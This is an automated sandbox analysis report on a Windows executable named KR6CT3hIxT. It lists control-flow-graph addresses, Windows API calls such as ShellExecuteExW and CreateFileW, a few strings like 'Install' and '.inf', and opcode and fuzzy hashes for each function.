                    control_flow_graph 1991 7ff7e1ddf4e0-7ff7e1ddf523 1992 7ff7e1ddf894-7ff7e1ddf8b9 call 7ff7e1db1fa0 call 7ff7e1de2320 1991->1992 1993 7ff7e1ddf529-7ff7e1ddf565 call 7ff7e1de3cf0 1991->1993 1999 7ff7e1ddf567 1993->1999 2000 7ff7e1ddf56a-7ff7e1ddf571 1993->2000 1999->2000 2002 7ff7e1ddf573-7ff7e1ddf577 2000->2002 2003 7ff7e1ddf582-7ff7e1ddf586 2000->2003 2004 7ff7e1ddf57c-7ff7e1ddf580 2002->2004 2005 7ff7e1ddf579 2002->2005 2006 7ff7e1ddf58b-7ff7e1ddf596 2003->2006 2007 7ff7e1ddf588 2003->2007 2004->2006 2005->2004 2008 7ff7e1ddf59c 2006->2008 2009 7ff7e1ddf628 2006->2009 2007->2006 2010 7ff7e1ddf5a2-7ff7e1ddf5a9 2008->2010 2011 7ff7e1ddf62c-7ff7e1ddf62f 2009->2011 2012 7ff7e1ddf5ab 2010->2012 2013 7ff7e1ddf5ae-7ff7e1ddf5b3 2010->2013 2014 7ff7e1ddf631-7ff7e1ddf635 2011->2014 2015 7ff7e1ddf637-7ff7e1ddf63a 2011->2015 2012->2013 2016 7ff7e1ddf5e5-7ff7e1ddf5f0 2013->2016 2017 7ff7e1ddf5b5 2013->2017 2014->2015 2018 7ff7e1ddf660-7ff7e1ddf673 call 7ff7e1dc63ac 2014->2018 2015->2018 2019 7ff7e1ddf63c-7ff7e1ddf643 2015->2019 2023 7ff7e1ddf5f5-7ff7e1ddf5fa 2016->2023 2024 7ff7e1ddf5f2 2016->2024 2020 7ff7e1ddf5ca-7ff7e1ddf5d0 2017->2020 2036 7ff7e1ddf675-7ff7e1ddf693 call 7ff7e1dd13c4 2018->2036 2037 7ff7e1ddf698-7ff7e1ddf6ed call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1dc32a8 call 7ff7e1db1fa0 2018->2037 2019->2018 2021 7ff7e1ddf645-7ff7e1ddf65c 2019->2021 2027 7ff7e1ddf5d2 2020->2027 2028 7ff7e1ddf5b7-7ff7e1ddf5be 2020->2028 2021->2018 2025 7ff7e1ddf600-7ff7e1ddf607 2023->2025 2026 7ff7e1ddf8ba-7ff7e1ddf8c1 2023->2026 2024->2023 2030 7ff7e1ddf60c-7ff7e1ddf612 2025->2030 2031 7ff7e1ddf609 2025->2031 2034 7ff7e1ddf8c3 2026->2034 2035 7ff7e1ddf8c6-7ff7e1ddf8cb 2026->2035 2027->2016 2032 7ff7e1ddf5c3-7ff7e1ddf5c8 2028->2032 2033 7ff7e1ddf5c0 2028->2033 2030->2026 2039 7ff7e1ddf618-7ff7e1ddf622 2030->2039 2031->2030 2032->2020 2040 7ff7e1ddf5d4-7ff7e1ddf5db 2032->2040 2033->2032 2034->2035 2041 7ff7e1ddf8de-7ff7e1ddf8e6 2035->2041 2042 7ff7e1ddf8cd-7ff7e1ddf8d4 2035->2042 2036->2037 2058 7ff7e1ddf6ef-7ff7e1ddf73d call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1dc5b60 call 7ff7e1db1fa0 2037->2058 2059 7ff7e1ddf742-7ff7e1ddf74f ShellExecuteExW 2037->2059 2039->2009 2039->2010 2048 7ff7e1ddf5e0 2040->2048 2049 7ff7e1ddf5dd 2040->2049 2044 7ff7e1ddf8eb-7ff7e1ddf8f6 2041->2044 2045 7ff7e1ddf8e8 2041->2045 2050 7ff7e1ddf8d6 2042->2050 2051 7ff7e1ddf8d9 2042->2051 2044->2011 2045->2044 2048->2016 2049->2048 2050->2051 2051->2041 2058->2059 2060 7ff7e1ddf846-7ff7e1ddf84e 2059->2060 2061 7ff7e1ddf755-7ff7e1ddf75f 2059->2061 2066 7ff7e1ddf850-7ff7e1ddf866 2060->2066 2067 7ff7e1ddf882-7ff7e1ddf88f 2060->2067 2063 7ff7e1ddf76f-7ff7e1ddf772 2061->2063 2064 7ff7e1ddf761-7ff7e1ddf764 2061->2064 2071 7ff7e1ddf774-7ff7e1ddf77f call 7ff7e1e1e188 2063->2071 2072 7ff7e1ddf78e-7ff7e1ddf7ad call 7ff7e1e1e1b8 call 7ff7e1ddfe24 2063->2072 2064->2063 2070 7ff7e1ddf766-7ff7e1ddf76d 2064->2070 2068 7ff7e1ddf87d call 7ff7e1de220c 2066->2068 2069 7ff7e1ddf868-7ff7e1ddf87b 2066->2069 2067->1992 2068->2067 2069->2068 2074 7ff7e1ddf8fb-7ff7e1ddf903 call 7ff7e1de7904 2069->2074 2070->2063 2076 7ff7e1ddf7e3-7ff7e1ddf7f0 CloseHandle 2070->2076 2071->2072 2091 7ff7e1ddf781-7ff7e1ddf78c ShowWindow 2071->2091 2072->2076 2098 7ff7e1ddf7af-7ff7e1ddf7b2 2072->2098 2081 7ff7e1ddf805-7ff7e1ddf80c 2076->2081 2082 7ff7e1ddf7f2-7ff7e1ddf803 call 7ff7e1dd13c4 2076->2082 2089 7ff7e1ddf82e-7ff7e1ddf830 2081->2089 2090 7ff7e1ddf80e-7ff7e1ddf811 2081->2090 2082->2081 2082->2089 2089->2060 2097 7ff7e1ddf832-7ff7e1ddf835 2089->2097 2090->2089 2096 7ff7e1ddf813-7ff7e1ddf828 2090->2096 2091->2072 2096->2089 2097->2060 2100 7ff7e1ddf837-7ff7e1ddf845 ShowWindow 2097->2100 2098->2076 2101 7ff7e1ddf7b4-7ff7e1ddf7c5 GetExitCodeProcess 2098->2101 2100->2060 2101->2076 2102 7ff7e1ddf7c7-7ff7e1ddf7dc 2101->2102 2102->2076
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                    • String ID: .exe$.inf$Install$p
                    • API String ID: 1054546013-3607691742
                    • Opcode ID: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
                    • Instruction ID: 620f4422edb14849d099d71bfcdd92059aacbcc10b8f851d400cc398a91a6adc
                    • Opcode Fuzzy Hash: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
                    • Instruction Fuzzy Hash: 2CC19362F1860295FB00EB65D9423B9A3B1AF89B84FC44133DE4D476A5DFBCE456C322

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                    • String ID:
                    • API String ID: 4119318379-0
                    • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                    • Instruction ID: feeb5531bbdc27fd99c2944d8da0972902def6ffa5bf661c01629aa653967fce
                    • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                    • Instruction Fuzzy Hash: 0741E232B1464286F700EF61E812BAAB360EB89F99FC40136ED4E07B95CFBDD4458765
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
                    • Instruction ID: 79f14f5da79cdec649c90fdffc74d9ce95309eaa92325e81b0c48d160e5a7b78
                    • Opcode Fuzzy Hash: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
                    • Instruction Fuzzy Hash: AF12F162F0874194EB10EB64D4427ECA371EB447A8F804233DA5E17AD9DFBCE58AC351

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3530 7ff7e1dc24c0-7ff7e1dc24fb 3531 7ff7e1dc2506 3530->3531 3532 7ff7e1dc24fd-7ff7e1dc2504 3530->3532 3533 7ff7e1dc2509-7ff7e1dc2578 3531->3533 3532->3531 3532->3533 3534 7ff7e1dc257a 3533->3534 3535 7ff7e1dc257d-7ff7e1dc25a8 CreateFileW 3533->3535 3534->3535 3536 7ff7e1dc2688-7ff7e1dc268d 3535->3536 3537 7ff7e1dc25ae-7ff7e1dc25de GetLastError call 7ff7e1dc6a0c 3535->3537 3538 7ff7e1dc2693-7ff7e1dc2697 3536->3538 3546 7ff7e1dc25e0-7ff7e1dc262a CreateFileW GetLastError 3537->3546 3547 7ff7e1dc262c 3537->3547 3540 7ff7e1dc26a5-7ff7e1dc26a9 3538->3540 3541 7ff7e1dc2699-7ff7e1dc269c 3538->3541 3544 7ff7e1dc26cf-7ff7e1dc26e3 3540->3544 3545 7ff7e1dc26ab-7ff7e1dc26af 3540->3545 3541->3540 3543 7ff7e1dc269e 3541->3543 3543->3540 3550 7ff7e1dc26e5-7ff7e1dc26f0 3544->3550 3551 7ff7e1dc270c-7ff7e1dc2735 call 7ff7e1de2320 3544->3551 3545->3544 3549 7ff7e1dc26b1-7ff7e1dc26c9 SetFileTime 3545->3549 3548 7ff7e1dc2632-7ff7e1dc263a 3546->3548 3547->3548 3554 7ff7e1dc2673-7ff7e1dc2686 3548->3554 3555 7ff7e1dc263c-7ff7e1dc2653 3548->3555 3549->3544 3552 7ff7e1dc26f2-7ff7e1dc26fa 3550->3552 3553 7ff7e1dc2708 3550->3553 3557 7ff7e1dc26ff-7ff7e1dc2703 call 7ff7e1db20b0 3552->3557 3558 7ff7e1dc26fc 3552->3558 3553->3551 3554->3538 3559 7ff7e1dc2655-7ff7e1dc2668 3555->3559 3560 7ff7e1dc266e call 7ff7e1de220c 3555->3560 3557->3553 3558->3557 3559->3560 3563 7ff7e1dc2736-7ff7e1dc273b call 7ff7e1de7904 3559->3563 3560->3554
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3536497005-0
                    • Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                    • Instruction ID: 2bfa529308b74f9839aa2f61804b27ec031d453aeaa6c525a6394fddb14771dc
                    • Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
                    • Instruction Fuzzy Hash: 7561F566A1874185EB20DB29E44136EA7B1FB847A8F500336DFAD03AD8CF7DD0A5C751

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                    • String ID: ]
                    • API String ID: 2347093688-3352871620
                    • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                    • Instruction ID: 8fc77f66d5151e7e327904687b6f3a500a261bf8041289a64ad8f939a0b171a7
                    • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                    • Instruction Fuzzy Hash: 1911B920B0924242FF25F711D656779D392AFCABC4F880136ED5D07B99DEBCE8548712

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchPeekTranslate
                    • String ID:
                    • API String ID: 1266772231-0
                    • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                    • Instruction ID: 3eaa236b9351fc5f5fa116c0d671132563484501508a0f6f93eccbe2482597a7
                    • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                    • Instruction Fuzzy Hash: CDF0EC26B3855282FB51EB20E896BB6A3A1BFD0B46FC15472F98E42854DF7CD508CB11

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                    • String ID: EDIT
                    • API String ID: 4243998846-3080729518
                    • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                    • Instruction ID: 8d475a300f48051f6b9aa20d51ee36d99435a0a6de8bcd9fc8d148ff88c64499
                    • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                    • Instruction Fuzzy Hash: ED01D121B18A4381FB24EB21F8127F6E390BF99745FC80133DC4E06658DEBCE1498621

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3840 7ff7e1dc2ce0-7ff7e1dc2d0a 3841 7ff7e1dc2d13-7ff7e1dc2d1b 3840->3841 3842 7ff7e1dc2d0c-7ff7e1dc2d0e 3840->3842 3844 7ff7e1dc2d1d-7ff7e1dc2d28 GetStdHandle 3841->3844 3845 7ff7e1dc2d2b 3841->3845 3843 7ff7e1dc2ea9-7ff7e1dc2ec4 call 7ff7e1de2320 3842->3843 3844->3845 3847 7ff7e1dc2d31-7ff7e1dc2d3d 3845->3847 3849 7ff7e1dc2d3f-7ff7e1dc2d44 3847->3849 3850 7ff7e1dc2d86-7ff7e1dc2da2 WriteFile 3847->3850 3852 7ff7e1dc2daf-7ff7e1dc2db3 3849->3852 3853 7ff7e1dc2d46-7ff7e1dc2d7a WriteFile 3849->3853 3851 7ff7e1dc2da6-7ff7e1dc2da9 3850->3851 3851->3852 3854 7ff7e1dc2ea2-7ff7e1dc2ea6 3851->3854 3852->3854 3855 7ff7e1dc2db9-7ff7e1dc2dbd 3852->3855 3853->3851 3856 7ff7e1dc2d7c-7ff7e1dc2d82 3853->3856 3854->3843 3855->3854 3857 7ff7e1dc2dc3-7ff7e1dc2dd8 call 7ff7e1dbb4f8 3855->3857 3856->3853 3858 7ff7e1dc2d84 3856->3858 3861 7ff7e1dc2dda-7ff7e1dc2de1 3857->3861 3862 7ff7e1dc2e1e-7ff7e1dc2e6d call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1dbbca8 3857->3862 3858->3851 3861->3847 3863 7ff7e1dc2de7-7ff7e1dc2de9 3861->3863 3862->3854 3873 7ff7e1dc2e6f-7ff7e1dc2e86 3862->3873 3863->3847 3866 7ff7e1dc2def-7ff7e1dc2e19 3863->3866 3866->3847 3874 7ff7e1dc2e88-7ff7e1dc2e9b 3873->3874 3875 7ff7e1dc2e9d call 7ff7e1de220c 3873->3875 3874->3875 3876 7ff7e1dc2ec5-7ff7e1dc2ecb call 7ff7e1de7904 3874->3876 3875->3854
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileWrite$Handle
                    • String ID:
                    • API String ID: 4209713984-0
                    • Opcode ID: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
                    • Instruction ID: b47165199da1ae017189bcd83c12666f75c1c47a2edbea81bd4db5be1e11b34a
                    • Opcode Fuzzy Hash: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
                    • Instruction Fuzzy Hash: FE516C62B1864292FB10EB25D44677AA320FF94790FD44133EA4D07AD4DFBCE585C7A2

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                    • String ID:
                    • API String ID: 3750147219-0
                    • Opcode ID: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
                    • Instruction ID: 5f312dab9941ff0a686f1e2a9d303816dd7a346a449ac03acbbaab244557dea6
                    • Opcode Fuzzy Hash: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
                    • Instruction Fuzzy Hash: 6051E362F1465680FB04EBA4D8463ADA322AF45BA5FC08637DA1C567D9DFBCE440C362
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 2359106489-0
                    • Opcode ID: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
                    • Instruction ID: ab023a8921c360b63ebfc78d8ccea78312e98e6ee4afabcc4f38b1312b197f02
                    • Opcode Fuzzy Hash: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
                    • Instruction Fuzzy Hash: C631D522A0C68251EF60FB25A446379E351FF897A0FD04632EE9D836D4CFBCD445C652
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                    • String ID:
                    • API String ID: 1452418845-0
                    • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                    • Instruction ID: dacb93139019ffd7e0070ff0f39b7b96302d00f15014b28d956a54d6e464f07e
                    • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                    • Instruction Fuzzy Hash: 53316921E0811242FB6CFB6494533B9A391AF41746FC48436EA0E8B2D7DEFCB5448273
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorLast$FileHandleRead
                    • String ID:
                    • API String ID: 2244327787-0
                    • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                    • Instruction ID: 1c1627b2d6be23228e8113a650a18fe3e3eb498410e59ab945f2ac29a7927b34
                    • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                    • Instruction Fuzzy Hash: 27216221A0C55281EB60FF11A401339E3A0FB85B94F94493ADA5D4A688CFBDE995C7B3
                    APIs
                      • Part of subcall function 00007FF7E1DCECD8: ResetEvent.KERNEL32 ref: 00007FF7E1DCECF1
                      • Part of subcall function 00007FF7E1DCECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF7E1DCED07
                    • ReleaseSemaphore.KERNEL32 ref: 00007FF7E1DCE974
                    • FindCloseChangeNotification.KERNELBASE ref: 00007FF7E1DCE993
                    • DeleteCriticalSection.KERNEL32 ref: 00007FF7E1DCE9AA
                    • CloseHandle.KERNEL32 ref: 00007FF7E1DCE9B7
